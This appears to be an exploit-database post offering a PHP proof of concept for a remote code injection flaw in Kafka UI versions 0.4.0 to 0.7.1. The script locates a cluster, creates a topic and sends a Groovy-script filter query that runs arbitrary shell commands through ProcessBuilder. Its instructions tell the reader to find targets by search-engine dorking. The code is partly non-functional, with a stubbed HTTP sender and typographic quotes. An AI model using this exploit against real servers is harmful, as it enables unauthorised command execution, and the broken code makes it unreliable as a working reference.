Kafka UI 0.7.1 Code Injection

=============================================================================================================================================
| # Title : Kafka UI 0.7.1 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://github.com/provectus/kafka-ui/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 159 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php
class KafkaUIExploit {
private $target;
private $version;
private $cluster;
private $new_topic;

public function __construct($target) {
$this->target = $target;
}

public function vuln_version() {
$uri = $this->normalize_uri(‘/actuator/info’);
$response = $this->send_request(‘GET’, $uri, ‘application/json’);

if ($response && $response[‘status_code’] == 200) {
$json_response = json_decode($response[‘body’], true);

if (!empty($json_response)) {
if (isset($json_response[‘build’][‘version’])) {
$this->version = ltrim($json_response[‘build’][‘version’], ‘v’);
} elseif (isset($json_response[‘git’][‘commit’][‘id’])) {
// Git commit versioning (this part should check with a local list if needed)
$git_commit_id = substr($json_response[‘git’][‘commit’][‘id’], 0, 7);
// Implement logic to map git commit to version
}
return version_compare($this->version, ‘0.7.1’, ‘<=’) && version_compare($this->version, ‘0.4.0’, ‘>=’);
}
}
return false;
}

public function get_cluster() {
$uri = $this->normalize_uri(‘/api/clusters’);
$response = $this->send_request(‘GET’, $uri, ‘application/json’);

if ($response && $response[‘status_code’] == 200) {
$json_response = json_decode($response[‘body’], true);
foreach ($json_response as $cluster) {
if ($cluster[‘status’] == ‘online’ || $cluster[‘topicCount’] > 0) {
return $cluster[‘name’];
}
}
}
return null;
}

public function create_topic($cluster) {
$topic_name = $this->random_string(8);
$post_data = json_encode([
‘name’ => $topic_name,
‘partitions’ => 1,
‘replicationFactor’ => 1,
‘configs’ => [
‘cleanup.policy’ => ‘delete’,
‘retention.bytes’ => ‘-1’
]]);

$uri = $this->normalize_uri(“/api/clusters/$cluster/topics”);
$response = $this->send_request(‘POST’, $uri, ‘application/json’, $post_data);

if ($response && $response[‘status_code’] == 200) {
$json_response = json_decode($response[‘body’], true);
return $json_response[‘name’];
}
return null;
}

public function delete_topic($cluster, $topic) {
$uri = $this->normalize_uri(“/api/clusters/$cluster/topics/$topic”);
$response = $this->send_request(‘DELETE’, $uri, ‘application/json’);
return $response[‘status_code’] == 200;
}

public function produce_message($cluster, $topic) {
$post_data = json_encode([
‘partition’ => 0,
‘key’ => ‘null’,
‘content’ => ‘null’,
‘keySerde’ => ‘String’,
‘valueSerde’ => ‘String’
]);

$uri = $this->normalize_uri(“/api/clusters/$cluster/topics/$topic/messages”);
$response = $this->send_request(‘POST’, $uri, ‘application/json’, $post_data);
return $response[‘status_code’] == 200;
}

public function execute_command($cmd) {
$payload = “Process p=new ProcessBuilder(\”sh\”,\”-c\”,\”$cmd\”).redirectErrorStream(true).start()”;
$uri = $this->normalize_uri(“/api/clusters/{$this->cluster}/topics/{$this->new_topic}/messages”);

$params = [
‘q’ => $payload,
‘filterQueryType’ => ‘GROOVY_SCRIPT’,
‘attempt’ => 2,
‘limit’ => 100,
‘page’ => 0,
‘seekDirection’ => ‘FORWARD’,
‘keySerde’ => ‘String’,
‘valueSerde’ => ‘String’,
‘seekType’ => ‘BEGINNING’
];

return $this->send_request(‘GET’, $uri, ‘application/x-www-form-urlencoded’, ”, $params);
}

public function check() {
if ($this->vuln_version()) {
return “Kafka-ui version: {$this->version} is vulnerable”;
}
return “Kafka-ui version is not vulnerable or unknown.”;
}

public function exploit() {
$this->cluster = $this->get_cluster();
if (!$this->cluster) {
die(“Could not find or connect to an active Kafka cluster.”);
}

$this->new_topic = $this->create_topic($this->cluster);
if (!$this->new_topic) {
die(“Could not create a new topic.”);
}

if (!$this->produce_message($this->cluster, $this->new_topic)) {
die(“Failed to trigger Groovy script payload execution.”);
}

$this->execute_command(‘your_command_here’); // Replace with your desired command

if ($this->delete_topic($this->cluster, $this->new_topic)) {
echo “Successfully deleted topic {$this->new_topic}.”;
} else {
echo “Could not delete topic {$this->new_topic}. Manual cleanup required.”;
}
}

private function send_request($method, $uri, $content_type, $data = ”, $params = []) {
// Placeholder for HTTP request logic (curl, file_get_contents, etc.)
// Implement this function with your desired HTTP request library in PHP
return [
‘status_code’ => 200,
‘body’ => ‘{}’
];
}

private function normalize_uri($path) {
return $this->target . $path;
}

private function random_string($length) {
return bin2hex(random_bytes($length / 2));
}
}

// Example usage:
$exploit = new KafkaUIExploit(“http://target.com”);
echo $exploit->check();
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================